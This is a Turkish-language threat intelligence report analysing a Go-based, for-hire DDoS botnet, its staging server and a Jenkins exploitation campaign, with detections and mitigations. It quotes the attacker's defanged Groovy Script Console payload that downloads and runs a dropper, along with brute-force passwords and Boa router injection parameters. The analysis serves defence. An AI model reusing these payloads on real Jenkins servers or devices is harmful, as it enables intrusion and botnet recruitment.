Bu sayfa bir çeviridir. Esas alınan metin İngilizce sürümdür. İngilizcesini okuyun

malware · botnet · ddos · golang · iot · jenkins · honeypot · mirai

Çok Platformlu, Kiralık Bir Go DDoS Botnet'i

Kinryū Labs, 11 ikili dosyadan ve 13 mimariden oluşan bir dropper paketi hâlinde dağıtılan ve günlerce süren bir Jenkins Script Console istismar kampanyasıyla teslim edilen, Go ile derlenmiş bir DDoS botnet'inin Windows derlemesi olan bot.exe'yi analiz etti. Hazırlama sunucusuna yönelik keşif çalışması, çalışır durumda ve kimlik doğrulamalı bir kiralık DDoS API'si, bir Go SSH komut kanalı ve aynı sunucuda barındırılan Mirai soyundan bir aile tespit etti. Bunun ticari bir kiralık DDoS operasyonu olduğunu yüksek güvenle değerlendiriyoruz.

Yazan Davis Zheng·

TLP:CLEAR. Kamuya açık yayım için onaylanmıştır. Kinryū Labs bal küpü sensör ağı tarafından yakalanmıştır. Aşağıdaki göstergeler etkisizleştirilmiştir.

Yönetici özeti

  • 13mimari derlemesi, 11 benzersiz ikili dosya
  • 5adlandırılmış DDoS yöntemi, ayrıca kiralık bir API
  • 3tek bir /22 içinde eşgüdümlü kaynak IP
  • 2tek sunucuda botnet ailesi

bot.exe, çok mimarili bir dropper paketi olarak dağıtılan ve Go ile derlenmiş bir DDoS botnet’inin Windows x86-64 derlemesidir. Pakete eşlik eden bins.sh adlı kabuk betiği, Windows ikili dosyasının yanı sıra 32 ve 64 bit x86’yı, dört ARM profilini, ARM64’ü, Android ARM64’ü ve big-endian ile little-endian MIPS’i kapsayan on üç mimari derlemesini indirir; yinelenenler ayıklandığında bunların on biri benzersizdir. Paket, bal küpü ağına dışarıya açık bir Jenkins sunucusunun istismar edilmesi yoluyla ulaşmıştır.

Zararlı yazılım, adlandırılmış beş flood yöntemini (HTTP, TLS el sıkışması, ICMP, doğrudan TLS ve VOULT olarak etiketlenen hacimsel bir yöntem), meşru trafiğe benzemek amacıyla tarayıcı User-Agent dizgilerini ve yerel ayar başlıklarını döndüren bir HTTP flood’unu ve kendi kendine yayılmak için RealTek SDK cihazlarındaki Boa web sunucusunu hedefleyen komut enjeksiyonu yüklerini barındırmaktadır. 185.226.93[.]242 adresindeki hazırlama sunucusuna yönelik keşif çalışması, 3333 numaralı portta kimlik doğrulamalı bir kiralık DDoS API’si, komut kanalı işlevi gören ve 2222 numaralı portta Go ile gerçeklenmiş bir SSH hizmeti ve Mirai/Gafgyt soyundan ikinci bir botnet ailesini barındıran anonim bir FTP hizmeti tespit etmiştir.

Kinryū Labs, bot.exe’nin ticari bir kiralık hizmet olarak işletilen, kötü niyetli, kendi kendine yayılan, çok mimarili bir DDoS botnet’inin parçası olduğunu yüksek güvenle değerlendirmektedir. Değerlendirmeyi üç bulgu taşımaktadır: ikili dosyanın kendi saldırı yöntemi ve istismar dizgileri; operatörün hazırlama sunucusunda iş parametrelerini doğrulayan ve kimlik doğrulaması isteyen, çalışır durumdaki kiralık API; ve paketi teslim eden eşgüdümlü kaynak adreslerden yürütülen sürekli bir kampanyaya ait bal küpü telemetrisi.

Temel değerlendirmeler
  • bot.exe, çok platformlu bir Go DDoS botnet'idir. Beş ayrı flood yöntemine ait günlük dizgisi hedef ve süre parametreleri taşımakta, bunların yanında tarayıcı taklidi düzeneği ve SOCKS5 desteği bulunmaktadır. Tümü gizlenmemiş dizgiler hâlindedir ve çalışır durumdaki API tarafından doğrulanmaktadır.
  • Operasyon, ticari bir kiralık DDoS hizmeti olarak yürütülmektedir. Hazırlama sunucusu, 3333 numaralı portta iş parametrelerini (user, psw, host, method, time, port) doğrulayan ve geçersiz kimlik bilgilerini reddeden bir API sunmaktadır.
  • Botnet, IoT komut enjeksiyonu yoluyla kendi kendine yayılmaktadır. İkili dosya, bir Boa formSysCmd komut enjeksiyonu yükü, yönlendirici oturum açma kaba kuvvet yolu ve dışa aktarılmış loginDevice ile loginDeviceCaptcha işlevlerini taşımakta; bal küpü günlüklerine kaydedilen dropper tek satırlık komutunun aynısını enjekte etmektedir.
  • Üç kaynak IP tek bir operatöre aittir. 185.226.92[.]0/22 içindeki üç adres, eşgüdümlü zamanlama ve ortak bir kimlik bilgisi listesiyle birebir aynı yükleri teslim etmiştir; ayrıca teslim ve hazırlama IP'leri birebir aynı SSH sunucu anahtarlarını sunmaktadır. Bu durum tek bir sunucuya ya da klonlanmış imajlara işaret etmektedir.

Teslim: sürekli bir Jenkins Script Console kampanyası

Paket, internete açık bir Jenkins örneğinin istismar edilmesiyle teslim edilmiştir. Bal küpü telemetrisi tutarlı, iki adımlı bir yöntem kaydetmiştir: CSRF belirtecini almak için bir GET /crumbIssuer/api/json, ardından Groovy Script Console yükü taşıyan bir POST /script. Yük bütün denemelerde birebir aynıydı ve burada etkisizleştirilmiş hâlde verilmektedir:

println new ProcessBuilder('sh','-c',
  'cd /tmp; wget hxxp://185.226.93[.]242:1001/bins.sh;
   curl -O hxxp://185.226.93[.]242:1001/bins.sh;
   chmod 777 *; ./bins.sh'
).redirectErrorStream(true).start().text

İstekler, admin hesabı için zayıf sayısal parolalardan oluşan kısa bir sözlüğü sırayla deneyen bir Authorization: Basic başlığı taşımıştır (admin:1123, admin:123451, admin:1231231, admin:1111111, admin:12345123). Bu, hedefe yönelik bir kimlik doğrulamadan çok otomatik bir kimlik bilgisi listesinin imzasıdır.

Kampanya, birkaç gün boyunca yinelenen dalgalar hâlinde yürütülmüştür:

  • Dalga 1İlk yoklamalar: hazırlama IP'sinden ve aynı blok içindeki ikinci bir adresten gelen CSRF crumb denetimi ve ardından Groovy RCE.
  • Yakalamabins.sh ve on üç varyantın tamamı, yaklaşık on dört saat arayla iki kez yakalandı; her seferinde bayt düzeyinde aynıydı.
  • Sonraki dalgalarÜç kaynak IP'nin tamamından, birbirinden dakikalar arayla ve döndürülen User-Agent dizgileriyle yürütülen paralel istismar.

İstismar istekleri geniş bir gerçekçi tarayıcı User-Agent kümesini döndürürken, yeni Jenkins hedefleri arayan keşif taraması (bir /login isteğinin ardından gelen hızlı /script isteği salvosu) varsayılan Go-http-client/1.1 değerini kullanmıştır. Sahte User-Agent dizgileri istismar yükleriyle birlikte gelmekte, tarayıcı ise botnet’in kendi Go istemcisini kullanmaktadır. Hazırlama ve C2 sunucusunun kendisi de istismara katılmıştır; dolayısıyla saldırı ve barındırma altyapısı birbirinden ayrılmamıştır.

Zararlı yazılım: tek bir Go kod tabanı, on bir ikili dosya

Botun Go ile yazılması, tek bir kod tabanının operatörün istediği her hedefe çapraz derlenmesine olanak tanımaktadır. Dropper, ürün hattının tamamını dolaşır; her derlemeyi wget ile, yedek olarak bir kez de curl ile indirir, çalıştırılabilir olarak işaretler, çalıştırır ve siler. Pakette, Linux dropper’ının yine de chmod +x uyguladığı bir Windows .exe dosyası bulunmaktadır ve betiğin üretilmiş yapısı, derle-ve-listele biçiminde bir üretim hattına işaret etmektedir. Yinelenenler ayıklandığında on üç derleme on bir benzersiz ikili dosyaya inmektedir: x86 ile i386 derlemeleri birbiriyle aynıdır; genel ARM ile ARMv7 derlemeleri için de aynı durum geçerlidir. MIPS ve eski ARM’den Android’e uzanan mimari yelpazesi, yönlendiricileri, kameraları ve diğer gömülü cihazları hedefleyen bir botnet’e işaret etmektedir; Windows derlemesi ise aynı kodu masaüstlerine ve sunuculara taşımaktadır.

İkili dosya paketlenmiş değildir (PE bölüm entropileri 5.4 ile 6.3 arasındadır) ve sembolleri ayıklanmamıştır (Go derleme kimliği ve çalışma zamanı sembolleri bozulmadan durmaktadır); bu nedenle yetenekleri düz dizgiler hâlinde görülebilmektedir. Derleme zaman damgası sıfırlanmıştır ki bu, Go derlemeleri için olağandır.

İkili dosyanın günlük dizgilerinde beş flood yöntemi adlandırılmıştır ve her biri bir hedef ve bir süreyle biçimlendirilmektedir: bir “HTTP (Optimized)” flood’u, bir TLS/TCP “Handshake” tüketme flood’u, bir ICMP “PING” flood’u, doğrudan bir “TLS+” oturum flood’u ve hacimsel, büyük olasılıkla UDP tabanlı bir “VOULT” yöntemi. Hem uygulama katmanı hem de ağ katmanı seçenekleri mevcuttur.

HTTP flood’u, meşru trafik gibi görünmek üzere tasarlanmıştır. Windows, macOS, iPad ve Android üzerinde Chrome, Edge, Opera, Firefox ve Safari’ye ait ondan fazla tarayıcı User-Agent dizgisini, on beş Accept-Language yerel ayarını ve saldırı azaltma hizmetlerinin incelediği sec-fetch-* ile sec-ch-ua-* parmak izi başlıklarını döndürmektedir. Referer başlığını, itibarı yüksek küçük bir site kümesinden seçmektedir (google.com, reddit.com, facebook.com, bing.com, twitter.com ve fbi.gov). User-Agent kümesindeki girdilerden biri, birebir Hello World dizgisidir; bu geliştirici yer tutucusu, hiçbir meşru istemci tarafından gönderilmediği için temiz bir tespit imzası sunmaktadır.

Yayılma, birçok RealTek SDK yönlendiricisi ve kamerasında hâlâ sevk edilen küçük bir gömülü HTTP arka plan süreci olan Boa web sunucusunu hedeflemektedir. İkili dosya, Boa’nın formSysCmd işleyicisine yönelik bir komut enjeksiyonu yükü ile yönlendirici yönetim arayüzlerine yönelik bir oturum açma kaba kuvvet yolunu, JSON kimlik bilgisi alanları ve dışa aktarılmış loginDevice ile loginDeviceCaptcha işlevleriyle birlikte taşımaktadır. Enjekte edilen komut, dropper’ın tek satırlık komutudur; dolayısıyla ele geçirilen bir cihaz, bir sonrakinin teslim noktası hâline gelmektedir.

İkili dosyaya dâhil edilen Go modüllerinin tümü standart golang.org/x paketleridir; bağlanmış üçüncü taraf bir C2 çatısı yoktur. Bunlar arasında chacha20poly1305, http2/hpack, dns/dnsmessage ve http/httpproxy bulunmakta olup gözlemlenebilir yeteneklerle örtüşmektedir: kimlik doğrulamalı şifreli kanal, HTTP/2, ham DNS ve SOCKS5 vekilliği (socks5, socks connect ve socksUsernamePassword dizgileri mevcuttur). C2 yapılandırması çalışma zamanında hxxp://<C2>/config.dat adresinden alınmaktadır; ikili dosyada sabit kodlanmış tek adres, hazırlama sunucusudur.

Komuta-kontrol ve hazırlama altyapısı

Hazırlama sunucusuna yönelik keşif çalışması aşağıdaki hizmetleri tespit etmiştir:

PortHizmetAmaç
21/tcpvsftpd 3.0.3, anonim oturum açma etkinZararlı yazılım hazırlama (aşağıdaki ikinci aile)
22/tcpOpenSSH 9.2p1 (Debian)Operatör erişimi
1001/tcpGo net/http sunucusuBirincil hazırlama: bins.sh ve varyantlarını sunar
2222/tcpGo SSH (SSH-2.0-Go)Bot komut kanalı
3333/tcpGo net/http sunucusuKiralık DDoS API’si

Kiralık hizmet değerlendirmesini iki bulgu desteklemektedir. Teslim IP’si ile hazırlama sunucusu birebir aynı ED25519, RSA ve ECDSA SSH sunucu anahtarlarını sunmaktadır; bu da onları aynı makineye ya da tek bir şablondan klonlanmış imajlara yerleştirmektedir. 2222 numaralı porttaki Go SSH hizmeti ise 22 numaralı porttaki sistem OpenSSH’inden farklı bir anahtar sunmakta, bu da onu bir yönlendirmeden çok ayrı bir uygulama olarak işaretlemektedir. 3333 numaralı porttaki API, eksik parametreler (user, psw, host, method, time/duration, port) nedeniyle isteği reddetmekte ve test kimlik bilgileri için kimlik doğrulama hatası döndürmektedir; diğer tüm yollar 404 döndürmektedir. Bu, canlı altyapı üzerinde çalışan ticari bir booter’ın, istek başına kimlik doğrulaması yapan asgari arayüzüdür.

Aynı sunucuda ikinci bir aile

Anonim FTP hizmeti, burada dosya adlarından hareketle “boatnet” olarak anılan ayrı bir botnet ailesini barındırmaktadır. Dropper’ı (ohshit1.sh) BusyBox ftpget istemcisini kullanmakta, her ikili dosyayı çalıştırmadan önce WTF olarak yeniden adlandırmakta ve Mirai/Gafgyt soyuna ait sıra dışı gömülü hedefler (ARC, m68k, SH4, SPARC) dâhil olmak üzere on beş mimaride derlemeleri arka planda başlatmaktadır. İkili dosyalar C ile derlenmiş ELF biçimindedir, sembolleri ayıklanmış ve paketlenmiştir (entropi 7.6 ile 7.9 arasındadır ve UPX sihirli baytı yoktur; bu da özel bir paketleyiciye işaret etmektedir); dolayısıyla statik incelemeden geriye pek bir şey kalmamaktadır. boatnet artefaktları bot.exe paketinden daha eskidir ve ilgisiz bir kod tabanı çalıştırmaktadır; dolayısıyla tek bir sunucu iki farklı botnet ailesini barındırmaktadır.

Barındırma

Saldırgan IP’lerinin her ikisi de 185.226.92[.]0/22 içindedir; bu blok, RIPE NCC üzerinden Türkiye merkezli bir VPS sağlayıcısına (ağ adı BIGCORE-US, AS205196 / AS57152) tahsis edilmiş olup kötüye kullanım iletişim adresi abuse@bigcore.net’tir. Barındırma sağlayıcısını bildirim amacıyla belirtiyoruz ve operatörün kimliği hakkında herhangi bir iddiada bulunmuyoruz.

İhlal göstergeleri

Saldırgan altyapısı etkisizleştirilmiştir. Örnek özetleri ve tespit dizgileri, bilinçli olarak gerçek değerlerini taşımaktadır.

Ağ

GöstergeBağlam
185.226.93[.]242Hazırlama + C2 sunucusu; aynı zamanda etkin bir tarayıcı
185.226.92[.]110Birincil tarayıcı / teslim düğümü
185.226.92[.]173İkincil tarayıcı
185.226.92[.]0/22Barındırma tahsisi (BIGCORE, AS205196). Çevrede makul bir engelleme
185.226.93[.]242:1001HTTP hazırlama (bins.sh + varyantlar)
185.226.93[.]242:2222Go SSH komut kanalı
185.226.93[.]242:3333Kiralık DDoS API’si (/api, parametre denetimli)
185.226.93[.]242:21Anonim FTP, boatnet hazırlama alanı
hxxp://<C2>/config.datÇalışma zamanı C2 yapılandırma alma deseni
/boafrm/formSysCmd, /boafrm/formLoginDışa doğru yayılmada Boa RCE ve oturum açma kaba kuvvet URI’leri
SSH sunucu anahtarı (ED25519) …INAjVN5fIlxTHxT4R3yqTS8…Teslim ve C2 IP’leri arasında ortak; pivot göstergesi

Dosyalar

DosyaSHA-256
bot.exe (Windows x64)4de4621f66780e1400bf3c55f146f84f6d77bbdd3a401451f3b7f16d674e3804
bins.sh (dropper)15f92c41e5f8ee6b2f6b7cfd14d2fc61bd4163a45d79c20a4d7974cb0fe68cf6
boatnet.0eem0a9ali (i386)6fbd581a3a6f1152de4090f0d5387258a905c76fb58f0d58191eae5f3d30421b
boatnet.0t25ax67hl (x86-64)920b114325d372c387616ff971947b42087dc018bb4812cdf2adae6005c1382d
  • bot.exe MD5 / SHA-1 / imphash: 88efcb919000efb700a814fc23e31e3f / 6817eae057adf831892995f514fca36c489fdd10 / 211e227000a1da3333aab2bad5282318
  • Go Build ID: euzQMg9dNAAGDYR0FLBy/NBlt-oXDyZN8MvU4a30l/8dJq21Cvc4y0nwb3h6ja/kYq23qQRIeCoh9BwgyGK
Dropper paketinin tüm özetleri (13 derleme içinde 11 benzersiz)
DerlemeSHA-256Boyut (bayt)
amd643261921456e347fb40c2d0a605db61ee058020872486c844653696d03ebb7b705,919,119
x86 / i386575eba4fffff7419985e4eef8e010c6c0a7dae00b23db45de895547faf2cc3985,787,832
arm / armv7l9e6da804ae9ca0a07348e92d99416bcf3fc650ccbdf4a9b4db34f6d546ddfb105,898,424
arm5365e22a1c1a77e5d88727ab6f8050548aa2170d3c2b4c8adcdfc1eb89eaea5825,898,424
arm634186fba4b5a9c640517020d43a1ba70bdf59f1163867917950e2f7459a0839f5,898,424
arm64ada33a0316d364d1d3be6d23ca2e590c16db7d845795619935e42e53f9293f6b5,579,151
android_arm647d7210719451068df7906798f37ec8fd86a0dfc3df10bfa939e3d436c72346cf6,169,144
mips9200aac4a356190252dc6131f6b60d59367c522537258838c017266d0e3b48f56,619,351
mipsle14d62a04e97f20f2d087dcf41fb44e5597cd3d6fbe4a597229d6b3c79c8ecde76,619,351
bot.exe4de4621f66780e1400bf3c55f146f84f6d77bbdd3a401451f3b7f16d674e38046,020,608

Sunucu ve kimlik bilgisi artefaktları

  • Jenkins admin kaba kuvvet sözlüğü: 1123, 123451, 1231231, 1111111, 12345123.
  • ohshit1.sh (boatnet dropper’ı) ve çalıştırılmadan önce WTF olarak yeniden adlandırılan bir ikili dosya.
  • Ayırt edici User-Agent değerleri: Hello World (bot HTTP flood’u) ve Go-http-client/1.1 (botun kendi taraması).

Davranışsal

  • Jenkins üzerinde GET /crumbIssuer/api/json isteğinin ardından, bins.sh dosyasını indiren bir Groovy ProcessBuilder('sh','-c', …) yükü taşıyan POST /script.
  • Bir sunucudaki /config.dat yoluna yapılan ve öncesinde Connecting to CNC... günlük satırı bulunan giden istekler.
  • sysCmdselect=5 parametresini ve wget … bins.sh gövdesini içeren gelen POST /boafrm/formSysCmd istekleri.

Tespit

Dizgiler kararlı ve gizlenmemiş olduğundan imza yazımı doğrudandır. Aşağıdaki YARA kuralı, doğrulanmış dizgilerden oluşturulmuş bir aday kuraldır; dağıtımdan önce doğrulayın.

rule go_ddos_bot_multiarch_candidate
{
    meta:
        description = "Candidate: Go-compiled multi-arch DDoS botnet (bot.exe family)"
        author      = "Kinryu Labs honeypot CTI"
        reference   = "4de4621f...e3804"  // full SHA-256 in the IOC table
        tlp         = "CLEAR"

    strings:
        $cnc  = "Connecting to CNC..." ascii
        $cfg  = "/config.dat" ascii
        $atk1 = "HTTP (Optimized) Attack started" ascii
        $atk2 = "VOULT attack" ascii
        $atk3 = "Handshake Attack started" ascii
        $boa  = "/boafrm/formSysCmd" ascii
        $iot  = "loginDeviceCaptcha" ascii
        $drop = "bins.sh" ascii

    condition:
        ($cnc and $cfg) or ($boa and $drop) or (2 of ($atk1, $atk2, $atk3) and $iot)
}

Ağ tespiti:

  • Jenkins: ham bir IP adresine wget/curl çağrısı yapan ProcessBuilder içeren POST /script gövdeleri için, özellikle de öncesinde GET /crumbIssuer/api/json varsa uyarı üretin.
  • IoT yayılımı: content:"/boafrm/formSysCmd"; content:"sysCmdselect=5";.
  • Altyapı: teslim ve C2 adreslerini kapsayan 185.226.92[.]0/22 bloğunu engelleyin ve bu aralıktaki 1001, 2222 ve 3333 numaralı portlara giden bağlantılar için uyarı üretin.

Giderme önlemleri

  • Jenkins’i internete açmayın. Kimlik doğrulama ve ağ yalıtımının arkasına yerleştirin, yönetici olmayan kullanıcılar için Script Console’u devre dışı bırakın ve erişilebilir bir derleme sunucusunu sunucunun tümüyle ele geçirilmesi riski olarak değerlendirin. Teslim vektörü buydu.
  • Jenkins için güçlü kimlik bilgilerini zorunlu kılın ve kimlik doğrulamayı hız sınırlamasına tabi tutun. Kampanya, admin hesabına yönelik zayıf sayısal parolalardan oluşan kısa bir sözlüğe dayanmaktaydı.
  • RealTek/Boa tabanlı yönlendiricileri ve IoT cihazlarını ayrı ağ bölümlerine alın ya da değiştirin; yönetim arayüzlerine dış erişimi engelleyin. Botnet’in yayılma hedefi bunlardır.
  • Barındırma tahsisini (185.226.92[.]0/22) ağ çevresinde engelleyin ve Boa RCE URI’si ile config.dat alma deseni için uyarı üretin.
  • Giden trafiği filtreleyin. Mimari adlarını taşıyan dosyaları indirmek için 1001 numaralı porttan ham bir IP adresine ulaşan ya da bu aralıktaki 2222 veya 3333 numaralı portlara bağlanan bir sunucu anormaldir ve sunucu üzerinde tespit bulunmayan yerlerde bu yolla yakalanabilir.
  • Altyapıyı bildirin. Kiralık DDoS API’si ve FTP üzerinden barındırılan zararlı yazılım, barındırma sağlayıcısının kötüye kullanım iletişim adresine (abuse@bigcore.net) bildirilebilir.

MITRE ATT&CK eşlemesi

TaktikTeknik
İlk ErişimT1190 Exploit Public-Facing Application (Jenkins Script Console; yayılma için Boa formSysCmd)
Kimlik Bilgisi ErişimiT1110.001 Brute Force: Password Guessing (Jenkins admin); T1110.004 Credential Stuffing (IoT oturum açma)
YürütmeT1059 Command and Scripting Interpreter (Script Console üzerinden Groovy; Unix kabuk dropper’ı)
KeşifT1046 Network Service Scanning (Jenkins/IoT kendi kendine tarama); T1082 System Information Discovery; T1057 Process Discovery
Savunma AtlatmaT1036 Masquerading (tarayıcı User-Agent döndürme; boatnet WTF yeniden adlandırması)
Komuta ve KontrolT1071.001 Web Protocols (config.dat); T1573 Encrypted Channel (ChaCha20-Poly1305; 2222 numaralı portta Go SSH); T1571 Non-Standard Port (1001/2222/3333); T1090.001 Internal Proxy: SOCKS
Yanal Hareket / TeslimT1105 Ingress Tool Transfer (çok mimarili hazırlama)
EtkiT1498.001 Direct Network Flood (PING, VOULT); T1498.002 Reflection Amplification (el sıkışma tüketmesi)

Yöntem ve notlar

  • Kapsam: çalıştırılmayan, yakalanmış ikili dosyaların statik analizi ve hazırlama sunucusuna yönelik etkin dış keşif (hizmet ve başlık numaralandırması, anonim FTP listelemesi ve 3333 numaralı porttaki API’nin kimlik doğrulamasız yoklanması). Hiçbir kimlik doğrulama mekanizması atlatılmamıştır.
  • YARA kuralı, doğrulanmış dizgilerden oluşturulmuş bir aday kuraldır; dağıtımdan önce doğrulayın. boatnet ikili dosyaları paketlenmiştir ve az sayıda dizgi vermiştir.
  • Örnekler (bot.exe paketi, dropper ve boatnet artefaktları), talep üzerine diğer araştırmacılara ve savunma ekiplerine sunulmaktadır. Kim olduğunuza ve bunlara hangi amaçla ihtiyaç duyduğunuza dair kısa bir notla contact@kinryu.sh adresine e-posta gönderin.
Sample
Go DDoS botnet · 6da756970a411dad…
How to cite
Kinryū Labs (2026). Çok Platformlu, Kiralık Bir Go DDoS Botnet'i. https://kinryu.sh/tr/reports/go-ddos-botnet-for-hire/